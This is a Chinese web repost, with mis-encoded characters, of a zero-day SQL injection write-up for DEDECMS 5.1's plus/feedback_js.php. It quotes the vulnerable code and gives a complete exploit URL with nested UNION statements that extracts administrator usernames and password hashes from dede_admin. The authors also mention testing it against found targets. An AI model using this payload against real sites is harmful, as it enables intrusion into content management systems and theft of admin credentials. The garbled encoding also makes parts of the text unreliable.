明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

DEDECMS 5.1 feedback_js.php 0DAY

發(fā)表時間:2023-04-20 來源:明輝站整理相關軟件相關文章人氣:

[摘要]作者:st0p&Rainy'Fox 同樣是在magic_quotes_gpc=off的情況下可用漏洞版本:DEDECMS 5.1 此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞...

作者:st0p&Rainy'Fox

同樣是在magic_quotes_gpc=off的情況下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞存在文件plus/feedback_js.php,未過濾參數(shù)為$arcurl

......

$urlindex = 0;

if(empty($arcID))

{

 $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");

       //此處$arcurl沒有過濾

 if(is_array($row)) $urlindex = $row['id'];

      //存在結果則把$urlindex賦值為查詢到的$row['id'],我們可以構造SQL語句帶入下面的操作中了

}

if(empty($arcID) && empty($urlindex)) exit();

//如果$arcID為空或$urlindex為空則退出

......

if(empty($arcID)) $wq = " urlindex = '$urlindex' ";

//我們讓$arcID為空,剛才上面執(zhí)行的結果就會被賦值給$wq帶入下面的操作中執(zhí)行了.

else $wq = " aid='$arcID' ";

 $querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";

$dlist->Init();

$dlist->SetSource($querystring);

看一下利用方法吧,嘿,為了閉合我用了兩次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

javascript:contentimage(this);>

唉,偶和Rainy'Fox這家伙找目標測試的時候,他竟然說能不能在magic_quotes_gpc=on時通過....這種想法太YD了..也太可怕了,要真可以實現(xiàn),這個網(wǎng)絡界又該亂了,好多程序都是在PHP默認magic_quotes_gpc為關閉時才會調用自身的轉義部分...要真能實現(xiàn),那就是PHP程序的惡夢了...


上面是電腦上網(wǎng)安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。